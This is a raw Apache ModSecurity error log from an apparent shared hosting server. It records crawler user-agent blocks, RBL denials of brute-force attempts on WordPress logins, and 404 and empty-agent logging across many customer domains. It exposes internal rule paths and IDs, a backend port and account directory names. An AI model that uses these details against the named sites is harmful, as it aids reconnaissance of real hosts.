[Tue May 26 18:41:11.737071 2026] [security2:error] [pid 1015481:tid 1015673] [client 185.191.171.11:64626] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/6/"] [unique_id "ahWb77QIKfWDMlp2INdZxAAAAUg"]
[Tue May 26 18:41:11.737231 2026] [security2:error] [pid 1015481:tid 1015673] [client 185.191.171.11:64626] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/6/"] [unique_id "ahWb77QIKfWDMlp2INdZxAAAAUg"]
[Tue May 26 18:41:12.030491 2026] [security2:error] [pid 1015481:tid 1015717] [client 47.128.17.109:49282] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.acacia.org.in"] [uri "/robots.txt"] [unique_id "ahWb8LQIKfWDMlp2INdZ0wAAAXQ"]
[Tue May 26 18:41:12.256900 2026] [security2:error] [pid 1015481:tid 1015737] [client 23.158.233.122:59293] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.233.158.23.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWb77QIKfWDMlp2INdZ0AAAAYg"], referer: https://www.cagmedya.com/web-tasarim-ajansi/
[Tue May 26 18:41:12.257048 2026] [security2:error] [pid 1015481:tid 1015737] [client 23.158.233.122:59293] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWb77QIKfWDMlp2INdZ0AAAAYg"], referer: https://www.cagmedya.com/web-tasarim-ajansi/
[Tue May 26 18:41:12.609396 2026] [security2:error] [pid 1015481:tid 1015724] [client 23.158.233.122:59317] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWb8LQIKfWDMlp2INdZ2AAAAXs"], referer: https://www.cagmedya.com/web-tasarim-ajansi/
[Tue May 26 18:41:12.897975 2026] [security2:error] [pid 1015481:tid 1015701] [client 69.58.91.143:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWb8LQIKfWDMlp2INdZ4gAAAWQ"], referer: https://anujtradingco.com
[Tue May 26 18:41:13.575257 2026] [security2:error] [pid 1015481:tid 1015672] [client 193.37.33.146:42807] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 146.33.37.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-login.php"] [unique_id "ahWb8bQIKfWDMlp2INdZ7gAAAUc"]
[Tue May 26 18:41:13.668564 2026] [security2:error] [pid 1015481:tid 1015666] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWb8bQIKfWDMlp2INdZ6wAAAUE"]
[Tue May 26 18:41:15.631617 2026] [security2:error] [pid 1015481:tid 1015495] [remote 94.76.235.103:45806] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWb87QIKfWDMlp2INdaGgABEA0"]
[Tue May 26 18:41:16.428967 2026] [security2:error] [pid 1015481:tid 1015635] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWb9LQIKfWDMlp2INdaIwAAASI"]
[Tue May 26 18:41:16.783584 2026] [security2:error] [pid 1015481:tid 1015620] [client 124.43.5.103:30875] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWb9LQIKfWDMlp2INdaMQAAARM"]
[Tue May 26 18:41:16.783808 2026] [security2:error] [pid 1015481:tid 1015620] [client 124.43.5.103:30875] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWb9LQIKfWDMlp2INdaMQAAARM"]
[Tue May 26 18:41:18.948532 2026] [security2:error] [pid 1015481:tid 1015664] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWb9rQIKfWDMlp2INdaVgAAAT8"]
[Tue May 26 18:41:19.232484 2026] [security2:error] [pid 1015481:tid 1015497] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWb97QIKfWDMlp2INdaXAABIg8"]
[Tue May 26 18:41:19.232643 2026] [security2:error] [pid 1015481:tid 1015635] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWb97QIKfWDMlp2INdaXAABIg8"]
[Tue May 26 18:41:21.860464 2026] [security2:error] [pid 1015481:tid 1015631] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWb-bQIKfWDMlp2INdaiQAAAR4"]
[Tue May 26 18:41:24.109912 2026] [security2:error] [pid 1015481:tid 1015706] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWb-7QIKfWDMlp2INdaxwAAAWk"]
[Tue May 26 18:41:26.539128 2026] [security2:error] [pid 1015481:tid 1015674] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWb_rQIKfWDMlp2INda8QAAAUk"]
[Tue May 26 18:41:27.844999 2026] [security2:error] [pid 1015481:tid 1015725] [client 124.43.5.103:49260] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWb_7QIKfWDMlp2INdbCwAAAXw"]
[Tue May 26 18:41:27.845159 2026] [security2:error] [pid 1015481:tid 1015725] [client 124.43.5.103:49260] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWb_7QIKfWDMlp2INdbCwAAAXw"]
[Tue May 26 18:41:29.614471 2026] [security2:error] [pid 1015481:tid 1015731] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcAbQIKfWDMlp2INdbKgAAAYI"]
[Tue May 26 18:41:29.859430 2026] [security2:error] [pid 1015481:tid 1015519] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWcAbQIKfWDMlp2INdbNAABWiU"]
[Tue May 26 18:41:29.859638 2026] [security2:error] [pid 1015481:tid 1015691] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWcAbQIKfWDMlp2INdbNAABWiU"]
[Tue May 26 18:41:30.464684 2026] [core:crit] [pid 1015481:tid 1015637] (13)Permission denied: [client 69.248.167.238:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:41:31.092603 2026] [security2:error] [pid 1015481:tid 1015613] [client 51.68.107.144:20661] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "panda-eco.com"] [uri "/robots.txt"] [unique_id "ahWcA7QIKfWDMlp2INdbSwAAAQw"]
[Tue May 26 18:41:31.092723 2026] [security2:error] [pid 1015481:tid 1015613] [client 51.68.107.144:20661] ModSecurity: Warning. Matched phrase "MJ12bot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "panda-eco.com"] [uri "/robots.txt"] [unique_id "ahWcA7QIKfWDMlp2INdbSwAAAQw"]
[Tue May 26 18:41:32.233313 2026] [security2:error] [pid 1015481:tid 1015617] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcA7QIKfWDMlp2INdbXQAAARA"]
[Tue May 26 18:41:33.444780 2026] [security2:error] [pid 1015481:tid 1015534] [remote 51.91.98.45:46418] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahWcBbQIKfWDMlp2INdbeAABUDQ"]
[Tue May 26 18:41:34.977987 2026] [security2:error] [pid 1015481:tid 1015704] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcBrQIKfWDMlp2INdbngAAAWc"]
[Tue May 26 18:41:35.402089 2026] [security2:error] [pid 1015481:tid 1015632] [client 74.7.175.164:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.robosoftware.bloggertarget.com"] [uri "/index.php"] [unique_id "ahWcBrQIKfWDMlp2INdbjQAAAR8"]
[Tue May 26 18:41:35.402125 2026] [security2:error] [pid 1015481:tid 1015632] [client 74.7.175.164:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.robosoftware.bloggertarget.com"] [uri "/index.php"] [unique_id "ahWcBrQIKfWDMlp2INdbjQAAAR8"]
[Tue May 26 18:41:35.402873 2026] [security2:error] [pid 1015481:tid 1015616] [client 74.7.175.164:32972] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.robosoftware.bloggertarget.com"] [uri "/robots.txt"] [unique_id "ahWcBrQIKfWDMlp2INdbiwABD18"]
[Tue May 26 18:41:35.441016 2026] [security2:error] [pid 1015481:tid 1015581] [remote 95.217.78.234:41924] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.78.217.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWcB7QIKfWDMlp2INdbsAABLGM"]
[Tue May 26 18:41:35.673304 2026] [security2:error] [pid 1015481:tid 1015559] [remote 160.250.186.220:50014] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWcB7QIKfWDMlp2INdbuwABYE0"]
[Tue May 26 18:41:35.774885 2026] [security2:error] [pid 1015481:tid 1015641] [client 74.7.175.164:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "robosoftware.bloggertarget.com"] [uri "/index.php"] [unique_id "ahWcB7QIKfWDMlp2INdbvgAAASg"], referer: https://www.robosoftware.bloggertarget.com/robots.txt
[Tue May 26 18:41:35.775685 2026] [security2:error] [pid 1015481:tid 1015686] [client 74.7.175.164:32988] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "robosoftware.bloggertarget.com"] [uri "/robots.txt"] [unique_id "ahWcB7QIKfWDMlp2INdbvAABVUs"], referer: https://www.robosoftware.bloggertarget.com/robots.txt
[Tue May 26 18:41:36.427497 2026] [security2:error] [pid 1015481:tid 1015544] [remote 92.205.109.21:52348] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.109.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWcCLQIKfWDMlp2INdbywABiT4"]
[Tue May 26 18:41:36.977214 2026] [security2:error] [pid 1015481:tid 1015678] [client 114.119.145.65:38123] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "rainadelproperties.com"] [uri "/our-team/"] [unique_id "ahWcCLQIKfWDMlp2INdb3AAAAU0"], referer: https://rainadelproperties.com/
[Tue May 26 18:41:37.182237 2026] [security2:error] [pid 1015481:tid 1015695] [client 49.36.119.43:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.ucdc.co.in"] [uri "/index.php"] [unique_id "ahWcCbQIKfWDMlp2INdb3wAAAV4"]
[Tue May 26 18:41:37.183165 2026] [security2:error] [pid 1015481:tid 1015737] [client 49.36.119.43:65173] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.ucdc.co.in"] [uri "/"] [unique_id "ahWcCbQIKfWDMlp2INdb3QAAAYg"]
[Tue May 26 18:41:37.273997 2026] [security2:error] [pid 1015481:tid 1015567] [remote 95.217.78.234:41924] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.78.217.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWcCbQIKfWDMlp2INdb5gABGlU"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 18:41:37.656303 2026] [security2:error] [pid 1015481:tid 1015650] [client 160.119.76.58:33728] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.76.119.160.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "m2wealthadvisor.com"] [uri "/xmlrpc.php"] [unique_id "ahWcCbQIKfWDMlp2INdb5wAAATE"]
[Tue May 26 18:41:37.658594 2026] [security2:error] [pid 1015481:tid 1015715] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcCbQIKfWDMlp2INdb5QAAAXI"]
[Tue May 26 18:41:37.876537 2026] [security2:error] [pid 1015481:tid 1015578] [remote 178.128.36.92:35806] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.36.128.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWcCbQIKfWDMlp2INdb7gABZWA"]
[Tue May 26 18:41:38.037005 2026] [security2:error] [pid 1015481:tid 1015564] [remote 178.128.36.92:35806] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.36.128.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWcCrQIKfWDMlp2INdb8gABVFI"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:41:38.244044 2026] [security2:error] [pid 1015481:tid 1015696] [client 160.119.76.58:33740] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.76.119.160.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "m2wealthadvisor.com"] [uri "/wp-login.php"] [unique_id "ahWcCrQIKfWDMlp2INdb9gAAAV8"]
[Tue May 26 18:41:38.333306 2026] [security2:error] [pid 1015481:tid 1015733] [client 49.36.119.43:65174] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.ucdc.co.in"] [uri "/favicon.ico"] [unique_id "ahWcCrQIKfWDMlp2INdb9wAAAYQ"]
[Tue May 26 18:41:38.359184 2026] [security2:error] [pid 1015481:tid 1015726] [client 216.73.217.81:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.ndequipments.com"] [uri "/index.php"] [unique_id "ahWcCrQIKfWDMlp2INdb-QABfQA"]
[Tue May 26 18:41:38.406943 2026] [security2:error] [pid 1015481:tid 1015629] [client 124.43.5.103:32077] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWcCrQIKfWDMlp2INdb_QAAARw"]
[Tue May 26 18:41:38.407250 2026] [security2:error] [pid 1015481:tid 1015629] [client 124.43.5.103:32077] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWcCrQIKfWDMlp2INdb_QAAARw"]
[Tue May 26 18:41:38.690982 2026] [security2:error] [pid 1015481:tid 1015579] [remote 8.130.10.226:45304] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 226.10.130.8.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWcCrQIKfWDMlp2INdb_gABRmE"]
[Tue May 26 18:41:38.801268 2026] [security2:error] [pid 1015481:tid 1015669] [client 104.28.122.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWcCrQIKfWDMlp2INdcBAAAAUQ"]
[Tue May 26 18:41:38.899811 2026] [security2:error] [pid 1015481:tid 1015545] [remote 178.156.182.155:54986] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 155.182.156.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWcCrQIKfWDMlp2INdcCgABIj8"]
[Tue May 26 18:41:39.946049 2026] [security2:error] [pid 1015481:tid 1015536] [remote 92.205.109.21:52348] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.109.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWcC7QIKfWDMlp2INdcIwABEDY"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:41:40.230000 2026] [security2:error] [pid 1015481:tid 1015620] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcC7QIKfWDMlp2INdcIgAAARM"]
[Tue May 26 18:41:40.663378 2026] [security2:error] [pid 1015481:tid 1015596] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWcDLQIKfWDMlp2INdcMAABbnI"]
[Tue May 26 18:41:40.663637 2026] [security2:error] [pid 1015481:tid 1015711] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWcDLQIKfWDMlp2INdcMAABbnI"]
[Tue May 26 18:41:42.413972 2026] [security2:error] [pid 1015481:tid 1015663] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcDrQIKfWDMlp2INdcVgAAAT4"]
[Tue May 26 18:41:43.800852 2026] [security2:error] [pid 1015481:tid 1015664] [client 172.226.44.131:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWcD7QIKfWDMlp2INdceAAAAT8"]
[Tue May 26 18:41:45.580484 2026] [security2:error] [pid 1015481:tid 1015730] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcEbQIKfWDMlp2INdcnQAAAYE"]
[Tue May 26 18:41:46.177025 2026] [proxy:error] [pid 1015481:tid 1015681] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:41:46.177073 2026] [proxy_http:error] [pid 1015481:tid 1015681] [client 3.139.242.79:41947] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
